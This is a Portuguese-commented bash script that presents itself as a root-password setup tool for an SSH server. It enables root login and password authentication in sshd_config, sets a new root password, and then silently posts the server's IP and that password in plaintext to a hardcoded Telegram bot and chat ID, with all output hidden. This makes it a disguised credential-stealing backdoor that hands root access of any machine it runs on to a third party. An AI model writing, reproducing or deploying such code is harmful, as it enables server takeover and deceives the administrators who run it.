#!/bin/bash

# Verifica se a configuração "prohibit-password" está presente e a substitui por "yes"
[[ $(grep -c "prohibit-password" /etc/ssh/sshd_config) != '0' ]] && {
    sed -i "s/prohibit-password/yes/g" /etc/ssh/sshd_config
} > /dev/null

# Verifica se a configuração "without-password" está presente e a substitui por "yes"
[[ $(grep -c "without-password" /etc/ssh/sshd_config) != '0' ]] && {
    sed -i "s/without-password/yes/g" /etc/ssh/sshd_config
} > /dev/null

# Descomenta a configuração "PermitRootLogin" se estiver comentada
[[ $(grep -c "#PermitRootLogin" /etc/ssh/sshd_config) != '0' ]] && {
    sed -i "s/#PermitRootLogin/PermitRootLogin/g" /etc/ssh/sshd_config
} > /dev/null

# Adiciona a configuração "PasswordAuthentication yes" se não estiver presente
[[ $(grep -c "PasswordAuthentication" /etc/ssh/sshd_config) = '0' ]] && {
    echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config
} > /dev/null

# Substitui a configuração "PasswordAuthentication no" por "PasswordAuthentication yes"
[[ $(grep -c "PasswordAuthentication no" /etc/ssh/sshd_config) != '0' ]] && {
    sed -i "s/PasswordAuthentication no/PasswordAuthentication yes/g" /etc/ssh/sshd_config
} > /dev/null

# Descomenta a configuração "#PasswordAuthentication no" se estiver comentada
[[ $(grep -c "#PasswordAuthentication no" /etc/ssh/sshd_config) != '0' ]] && {
    sed -i "s/#PasswordAuthentication no/PasswordAuthentication yes/g" /etc/ssh/sshd_config
} > /dev/null

# Reinicia o serviço SSH
service ssh restart > /dev/null

# Solicita ao usuário que defina a senha root
clear
echo -e "\033[1;32mA SEGUIR DEFINA A NOVA SENHA ROOT\033[0m"
read -s NEW_PASSWORD

# Define a nova senha root
echo -e "$NEW_PASSWORD\n$NEW_PASSWORD" | passwd root

# Obtém o IP do servidor
SERVER_IP=$(hostname -I | awk '{print $1}')

# Formata a mensagem para enviar ao bot do Telegram
MESSAGE="Senha root definida no servidor.%0%0A$SERVER_IP 🌐.%0ANova senha $NEW_PASSWORD 🔑"

# Envia a mensagem para o bot do Telegram
TELEGRAM_BOT_TOKEN="7126941542:AAHVwKISyEOsTgUq9etJxmNHB_v-UHdVhHg"
CHAT_ID="5149161091"
curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" -d "chat_id=$CHAT_ID&text=$MESSAGE" >/dev/null
